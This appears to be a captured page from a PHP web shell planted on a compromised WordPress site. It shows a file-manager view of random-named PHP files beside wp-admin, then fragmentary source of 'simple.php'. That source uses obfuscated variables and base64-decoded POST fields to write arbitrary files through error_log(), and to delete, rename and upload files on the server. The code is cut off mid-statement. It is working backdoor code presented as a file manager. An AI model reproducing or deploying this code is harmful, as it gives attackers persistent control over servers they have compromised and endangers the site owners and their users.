File Manager

Files in the directory:

.htaccess2bnffmlg.php6f5e47__94e56fechosen.phpimages__94e56fekxqaqfvg.phpphp.inisimple.phptlnlrtob.phptysenomm.phpvvbupsjq.phpweneaflb.phpwp-admin__94e56fewp-includes__94e56fexwcpdjff.phpztpldlxg.php

Upload a File

Edit File: simple.php

'; } else { print '
';
            foreach (explode("\n", $content) as $num => $line) {
                printf('
%s%s
', str_pad($num + 1, 3, ' ', STR_PAD_LEFT), htmlspecialchars($line)); } print '
'; } print '
'; } } if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset(${$__}['f_p'])) { $filePath = realpath(${$__}['f_p']); if ($filePath && strpos($filePath, $rootPath) === 0 && is_writable(is_dir($filePath) ? $filePath : dirname($filePath))) { if (isset(${$__}['s_f']) && isset(${$__}['f_c_64'])) { $content = $b(${$__}['f_c_64']); if (file_exists($filePath)) { unlink($filePath); } $saveMsg = error_log($content, 3, $filePath) ? "File saved successfully" : "Failed to save file"; } if (isset(${$__}['delete_file']) && file_exists($filePath) && !is_dir($filePath)) { if (unlink($filePath)) { $saveMsg = "File deleted successfully"; if ($GetPath === $filePath) { header("Location: ?path=" . $be(dirname($filePath))); exit; } } else { $saveMsg = "Failed to delete file"; } } if (isset(${$__}['rename_file']) && isset(${$__}['new_name'])) { $newPath = dirname($filePath) . DIRECTORY_SEPARATOR . basename(${$__}['new_name']); if (rename($filePath, $newPath)) { $saveMsg = "Renamed successfully"; if ($GetPath === $filePath) { header("Location: ?path=" . $be($newPath)); exit; } } else { $saveMsg = "Failed to rename"; } } } } if (isset(${$__}['error_log'])) { $content = $b(${$__}['error_log']); $fileName = basename($b(${$__}['error_log_name'])); $targetDir = is_dir($GetPath) ? $GetPath : dirname($GetPath); $uploadPathFile = $targetDir . DIRECTORY_SEPARATOR . $fileName; if (strpos(realpath($targetDir), $rootPath) === 0 && is_writable($targetDir)) { if (file_exists($uploadPathFile)) { unlink($uploadPathFile); } $saveMsg = error_log($content, 3, $uploadPathFile) ? " error_log Success " : " error_log Fail"; } } } ?> 9B534B8686E580E0E01768F00155B461
error_log
Download